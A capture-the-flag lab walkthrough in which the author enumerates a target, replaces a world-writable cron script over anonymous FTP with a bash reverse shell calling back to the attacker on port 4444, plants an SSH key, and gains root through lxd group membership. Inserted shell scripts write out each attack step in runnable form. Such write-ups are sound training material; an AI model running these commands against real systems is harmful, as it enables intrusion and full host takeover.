This challenge was an interesting one and I really enjoyed it!
Now, let’s get to work and see how we can get all the answers needed for this challenge.
1. Enumerate the machine. How many ports are open?
We will scan the target with nmap in order to find out more about this server.
nmap -A 10.10.221.228
As we can see from the scan output, there are 4 open ports.
2. What service is running on port 21?
This information is also available in the scan we already performed: port 21 is running an FTP service.
3. What service is running on ports 139 and 445?
From the same output, we can see that ports 139 and 445 are running Samba (SMB).
4. There’s a share on the user’s computer. What’s it called?
For this question, we need to enumerate the SMB shares on the server. To do this, we will use the smbclient tool.
As you can see, a few shares were found, one of them being a directory of interest: the share called pics.
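The enumeration done so far, as an added example that is not part of the original walkthrough: a small shell script that wraps the nmap and smbclient commands and parses nmap's greppable output to list only the open ports, which is what the first question asks for. The target IP is the one from the post; the output file name and the sample scan output below are constructed for an offline check.

```shell
#!/bin/sh
# Added example (not the author's own commands): enumeration helpers that wrap
# nmap and smbclient and parse nmap's greppable (-oG) output offline.
# TARGET is the room IP from the post; everything else is an assumption.
TARGET="${TARGET:-10.10.221.228}"

# Full scan (-A) with greppable output saved to scan.gnmap; run on demand.
scan_target() {
    nmap -A -oG scan.gnmap "$TARGET"
}

# Print the open TCP ports found in a .gnmap file, one per line.
# Greppable format lists each port as "PORT/STATE/PROTO//SERVICE//VERSION/",
# so we keep only entries whose state is "open" (filtered/closed are skipped).
open_ports() {
    grep '^Host:.*Ports:' "$1" \
      | tr ',' '\n' \
      | grep -o '[0-9]*/open/tcp' \
      | cut -d/ -f1
}

# Number of open TCP ports (the answer to question 1).
count_open_ports() {
    open_ports "$1" | wc -l | tr -d ' '
}

# Anonymous (null session) listing of SMB shares, as used for question 4.
list_shares() {
    smbclient -L "//$TARGET" -N
}

# Constructed sample of nmap greppable output for an offline check. The open
# services match the post; the filtered port 80 is made up to show that
# non-open entries are ignored by the parser.
SAMPLE_GNMAP="$(mktemp)"
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap scan initiated (constructed sample, not real output)
Host: 10.10.221.228 () Status: Up
Host: 10.10.221.228 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/filtered/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//netbios-ssn///
EOF

echo "open ports: $(open_ports "$SAMPLE_GNMAP" | tr '\n' ' ')"
echo "count: $(count_open_ports "$SAMPLE_GNMAP")"
```

Against the real box you would call scan_target and then open_ports scan.gnmap; the parser deliberately drops filtered ports, which nmap still prints but which are not "open" for the purposes of the question.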
Well, now we are getting into the real work. Let's use what we discovered at point 4 and see if we can find anything interesting after connecting to the share.
Well, well, it looks like we found something. As you can see, there are 2 pictures in there. Let's download them and see if they can provide us any useful information.
I tried to get some information about the photos with steghide, in case they had something hidden inside them, but it asked for a passphrase, and with a blank passphrase it would not let me extract any info. Maybe we will find something useful later. I also tried exiftool, but nothing interesting appeared.
Anyway, if we go back to the port scan output, we can see something interesting about the FTP service: it allows anonymous login. Let's connect and see what we have there.
After logging in as the anonymous user, we see that there is a folder called scripts. Inside it we find a script, a log file and a to-do list. Let's get all 3 files and see what they contain and whether we can use the information they provide.
The to_do.txt file looks like a note where someone set a reminder to disable anonymous login on the FTP server because it's not safe. Well, it really isn't! Next, the script seems to be a cleanup script that writes some output to the log file we found on the FTP server. Judging by the number of lines in the log file, we can assume that the script runs on a schedule, and quite often. Also, have a look at the permissions of the cleanup script: they are more permissive than they should be, and the anonymous FTP user is allowed to overwrite the file. I decided to take advantage of this by replacing the content of the script with a reverse shell, in order to get a shell on the target machine.
I edited the clean.sh script, added a reverse shell one-liner, set the port to 4444 and entered the IP address I have from the TryHackMe VPN.
I started a netcat listener on the port I put in the script, 4444. Then I made the script executable, connected again to the FTP server and uploaded it there, overwriting the original.
After waiting a while for the script to run again, I got a bash shell on the victim's machine.
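The steps above, as an added example that is not the author's own commands: a shell script that checks whether the downloaded clean.sh is world-writable (the permissions problem the post points out), builds a replacement with a bash reverse shell, and uploads it over anonymous FTP. The attacker address 10.8.0.2 is an assumed VPN IP; the target IP and port 4444 are from the post.

```shell
#!/bin/sh
# Added example (not the author's own commands). LHOST is an assumed VPN
# address; TARGET is the room IP and LPORT the port used in the post.
TARGET="${TARGET:-10.10.221.228}"
LHOST="${LHOST:-10.8.0.2}"
LPORT="${LPORT:-4444}"

# The check: is the file writable by "others"? The 9th character of the
# ls -l mode string is the others-write bit (e.g. -rwxrwxrwx -> 'w').
is_world_writable() {
    [ "$(ls -l "$1" | cut -c9)" = "w" ]
}

# Write a replacement clean.sh that calls back to our listener. bash's
# /dev/tcp pseudo-device means the target does not need nc installed.
build_payload() {
    out="$1"
    cat > "$out" <<EOF
#!/bin/bash
bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1
EOF
    chmod +x "$out"
}

# Upload over anonymous FTP into the scripts directory, overwriting clean.sh
# (run on demand, after starting the listener: nc -lvnp "$LPORT").
upload_payload() {
    ftp -n "$TARGET" <<EOF
user anonymous anonymous
cd scripts
put $1 clean.sh
quit
EOF
}

# Offline demonstration with a constructed stand-in for the downloaded file.
WORK="$(mktemp -d)"
touch "$WORK/clean.sh"
chmod 777 "$WORK/clean.sh"          # the overly permissive mode seen on the share
if is_world_writable "$WORK/clean.sh"; then
    echo "clean.sh is world-writable, replacing it"
    build_payload "$WORK/clean.sh"
fi
cat "$WORK/clean.sh"
```

Start the listener first, then call upload_payload with the generated file; the shell arrives on the next scheduled run of the script. Because the original cleanup logic is replaced outright, the job will stop doing its real work, which is noisy on a real engagement; appending the one-liner to the existing script instead keeps the job's normal behaviour.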
Now, I could go directly to the flag, but I tried to spawn a proper shell first, to make it easier to work from the command line. I saw that python is installed there, but then I had a better idea. I checked the .ssh directory of the namelessone user and saw that it doesn't exist. So I decided to generate a public/private key pair, save the private key locally and use it to connect directly.
After generating the pair, I copied the content of the private key into a local file, changed the permissions of that file to 600 (otherwise ssh refuses to use it), appended the content of the public key (id_rsa.pub, not the private id_rsa) to authorized_keys in the remote .ssh directory and attempted to connect as namelessone. And I succeeded. Voila!
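The key-based access described above, as an added example that is not the author's own commands. It generates the key pair on the attacker's machine and pushes only the public half, so the private key never has to leave the attacker's box, and it installs the public key with the directory and file permissions sshd's StrictModes expects. The key path is an assumption; the home directory and key line used in the offline check are constructed.

```shell
#!/bin/sh
# Added example (not the author's own commands). TARGET is the room IP;
# the key file path is an assumption.
TARGET="${TARGET:-10.10.221.228}"
KEY="${KEY:-$HOME/.ssh/namelessone_key}"

# Attacker side: generate the pair locally and connect (run on demand).
generate_key() {
    ssh-keygen -t ed25519 -N '' -f "$KEY"
    chmod 600 "$KEY"          # ssh refuses a private key readable by others
}
connect() {
    ssh -i "$KEY" "namelessone@$TARGET"
}

# Target side: install one public key line into $home/.ssh/authorized_keys
# with the permissions sshd requires under StrictModes (700 dir, 600 file).
# The line is skipped if already present, so repeat runs do not bloat the file.
install_pubkey() {
    home="$1"; pub="$2"
    mkdir -p "$home/.ssh"
    chmod 700 "$home/.ssh"
    touch "$home/.ssh/authorized_keys"
    chmod 600 "$home/.ssh/authorized_keys"
    grep -qxF "$pub" "$home/.ssh/authorized_keys" \
        || printf '%s\n' "$pub" >> "$home/.ssh/authorized_keys"
}

# How many times a given key line appears (expect 1 after any number of installs).
key_count() {
    grep -cxF "$2" "$1/.ssh/authorized_keys"
}

# Offline demonstration with a constructed home directory and a fake key line.
FAKE_HOME="$(mktemp -d)"
FAKE_PUB="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedExampleKeyNotReal added-example"
install_pubkey "$FAKE_HOME" "$FAKE_PUB"
install_pubkey "$FAKE_HOME" "$FAKE_PUB"   # second run must not duplicate the line
echo "key present $(key_count "$FAKE_HOME" "$FAKE_PUB") time(s)"
ls -ld "$FAKE_HOME/.ssh" "$FAKE_HOME/.ssh/authorized_keys"
```

On the target you would run install_pubkey /home/namelessone "$(cat id.pub)" from the reverse shell, then connect from the attacker box. If sshd refuses the key, wrong permissions on .ssh or authorized_keys are the usual cause, which is why the function sets them explicitly.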
Now, let’s find the flag for user.txt.
This one was tougher. Even though I figured out what the vulnerability was, I needed some help from Google to exploit it. I had encountered this exploit in other challenges too, but not being too familiar with it, I had to get some help.
Initially, I wanted to check whether the user has any sudo rights, but since I didn't know the password, I couldn't. So I checked the information about "namelessone" and it turned out to be a member of the lxd group. That means we can exploit this: a member of lxd can create privileged containers and mount the host's filesystem inside them, which is as good as root on the host.
I had already downloaded an Alpine image for this exploit and just had to transfer it to the target machine. I chose to do it via sftp, even though it could also be downloaded directly from the victim's machine.
After importing the Alpine image, I created an lxd container with security.privileged=true, mounted the host's root directory on /mnt inside the container and started a shell in it, and there we are, with root access. From here, we just have to read the root flag. Since we mounted / on /mnt, the flag is at /mnt/root/root.txt.
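The lxd escalation above, as an added example that is not the author's own commands: a check that parses id output for lxd group membership, followed by the lxc commands that import the image, create a privileged container with the host's / mounted at /mnt and drop into a shell in it. The image tarball path, the container name and the sample id output are assumptions.

```shell
#!/bin/sh
# Added example (not the author's own commands): lxd group check plus the
# container steps that mount the host's / inside a privileged container.
# The Alpine image tarball path and container name are assumptions.
IMAGE="${IMAGE:-./alpine.tar.gz}"
CONTAINER="${CONTAINER:-privesc}"

# Does a line of `id` output show membership of the lxd group?
in_lxd_group() {
    printf '%s\n' "$1" | grep -Eq 'groups=.*\(lxd\)'
}

# Run on the target as the lxd member (on demand). The host filesystem ends
# up under /mnt in the container; because the container is privileged, root
# inside it can read and write the host's files, including /root/root.txt.
lxd_root_shell() {
    lxd init --auto 2>/dev/null || true      # harmless if lxd is already initialised
    lxc image import "$IMAGE" --alias alpine
    lxc init alpine "$CONTAINER" -c security.privileged=true
    lxc config device add "$CONTAINER" hostroot disk source=/ path=/mnt recursive=true
    lxc start "$CONTAINER"
    lxc exec "$CONTAINER" -- /bin/sh -c 'cat /mnt/root/root.txt; exec /bin/sh'
}

# Offline demonstration with constructed id output (the gid 108 is made up).
SAMPLE_ID="uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),108(lxd)"
if in_lxd_group "$SAMPLE_ID"; then
    echo "namelessone is in lxd: privileged container escape is possible"
fi
if in_lxd_group "$(id)"; then
    echo "the current user is in lxd as well"
fi
```

The fix on the defending side is simply not to put unprivileged users in the lxd group, since membership is equivalent to root; the check function is the same one you would drop into a local enumeration script.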
I hope you enjoyed this walkthrough!